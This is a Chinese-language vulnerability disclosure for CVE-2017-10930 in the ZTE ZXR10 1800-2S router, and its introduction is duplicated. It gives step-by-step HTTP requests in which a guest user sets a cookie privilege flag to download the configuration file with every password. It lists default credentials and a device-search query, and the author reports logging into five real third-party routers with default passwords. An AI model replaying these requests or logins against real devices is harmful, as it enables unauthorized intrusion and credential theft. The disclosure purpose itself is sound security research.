# 介绍 ZXR10 1800-2S 路由器是中兴通讯推出的集路由、交换、无线、安全、 VPN 于一体的智能集成多业务路由器产品,凭借模块化、可扩展的系统架构,为用户构建智能、高效、可靠、灵活、易维的网络。 该路由器可广泛灵活的适用于大客户接入、 DCN、园区网、校园网、政企网的出口网关、企业的总部/分支接入、金融网点、移动办公室、行业网纵向网的汇聚/接入等网络。 # CVE/CNVD/CNNVD & 厂商回应 CVE-2017-10930 中兴已发布该漏洞的预警,建议用户及时更新固件。http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1008262 三叶未来: http://blogs.sanyclover.com/archives/1 # 安全测试 在对该款路由器进行安全性测试的时候,我发现了路由器存在的一个关键性安全漏洞: 敏感信息泄露,如管理员账号,密码等 # 利用条件 我用管理员账号登录,经观察, ZXR10 1800-2S 的用户有管理员和普通用户之分,如下  管理员可以对系统进行全部操作,包括浏览设备信息,修改设备信息,下载配置文件,重启设备等等操作。然后再用普通用户账号登录,发现只能查看基本的信息  无任何修改权限。基于此,我展开了安全测试,尝试突破限制,当然,前提是你有一个普通用户账号。 我的环境是 产品名称智能集成多业务路由器 设备型号ZXR10 1800-2S 软件版本V3.00.30(ZSRV2V3.00.30(1.1.3)_ALMPFUG.set) 硬件版本V2.06 admin admin 管理员 who who 管理员 guest guest 普通用户 # 敏感信息泄露 用管理员账号登录系统,在 系统维护–配置管理 这里,我发现有意思的事...
# 介绍 ZXR10 1800-2S 路由器是中兴通讯推出的集路由、交换、无线、安全、 VPN 于一体的智能集成多业务路由器产品,凭借模块化、可扩展的系统架构,为用户构建智能、高效、可靠、灵活、易维的网络。 该路由器可广泛灵活的适用于大客户接入、 DCN、园区网、校园网、政企网的出口网关、企业的总部/分支接入、金融网点、移动办公室、行业网纵向网的汇聚/接入等网络。 # CVE/CNVD/CNNVD & 厂商回应 CVE-2017-10930 中兴已发布该漏洞的预警,建议用户及时更新固件。http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1008262 三叶未来: http://blogs.sanyclover.com/archives/1 # 安全测试 在对该款路由器进行安全性测试的时候,我发现了路由器存在的一个关键性安全漏洞: 敏感信息泄露,如管理员账号,密码等 # 利用条件 我用管理员账号登录,经观察, ZXR10 1800-2S 的用户有管理员和普通用户之分,如下  管理员可以对系统进行全部操作,包括浏览设备信息,修改设备信息,下载配置文件,重启设备等等操作。然后再用普通用户账号登录,发现只能查看基本的信息  无任何修改权限。基于此,我展开了安全测试,尝试突破限制,当然,前提是你有一个普通用户账号。 我的环境是 产品名称智能集成多业务路由器 设备型号ZXR10 1800-2S 软件版本V3.00.30(ZSRV2V3.00.30(1.1.3)_ALMPFUG.set) 硬件版本V2.06 admin admin 管理员 who who 管理员 guest guest 普通用户 # 敏感信息泄露 用管理员账号登录系统,在 系统维护–配置管理 这里,我发现有意思的事  这里可以下载配置文件,直觉告诉我,这里有问题。于是我把配置文件下载下来,发现了意想不到的事情  这个配置文件包含所有用户的用户名和密码。当然,还有其他的信息,不过我们的关注点是用户名和密码。那么,显然,只有管理员才能下载配置文件。那么如果普通用户要是也能下载到,那就好玩了,于是,我把下载配置文件的数据包抓取下来 ``` POST /download.cgi HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 38 Cache-Control: max-age=0 Origin: http:// xxx.xxx.xxx.xxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http:// xxx.xxx.xxx.xxx /pagefile/webgui/html/chinese/sysmanager_startruncfg.htm Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: SESSIONID=5fd43169072c1fa79b657d87ac1b24f5; authority=2 Connection: close name=file_config&filename=startrun.dat ``` 仔细观察之后,发现只有 Cookie: SESSIONID=5fd43169072c1fa79b657d87ac1b24f5; authority=2 这里有标识身份, 显然 5fd43169072c1fa79b657d87ac1b24f5 就是当前用户的登录凭证,而authority 根据字面意思应该是标记当前用户的级别,是管理员还是普通用户。那么问题来了,如果我用普通用户的身份发送这个数据包, 能不能把配种文件下载下来呢?为了验证我的猜想,我用 guest guest 登录系统。 随便抓个数据包 ``` GET /pagefile/webgui/html/chinese/sys_baseinfo.htm HTTP/1.1 Host: xxx.xxx.xxx.xxx Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http:// xxx.xxx.xxx.xxx /pagefile/webgui/html/chinese/index.htm Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: SESSIONID=b573970d73cba52524bb73e52e17cf53; authority=1 Connection: close ``` 记下这里的 SESSIONID, 因为后面要用到。 这里 authority 值是 1,验证我们前面的猜想。 1标识普通用户, 2 标识管理员。然后用前面的数据包覆盖这个数据包,然后用前面记下的 SESSIONID 替换掉旧 SESSIONID。  最后发送这个数据包,令人惊喜的事,居然能下载下来,打开一看,同样包含所有用户的用户名和密码  # 影响面 在 shadan 使用: server:ZTE title:ZSRV2 路由器 Web 管理系统 搜 索 这 款 路 由 器 , 发 现 有 多 达 475 个 , 其 中 大 部 分 都 在 中 国 地 区  另外我随机选了 10 个路由器,用 admin admin who who zte zte 尝试,竟然成功登陆 5 个路由器。
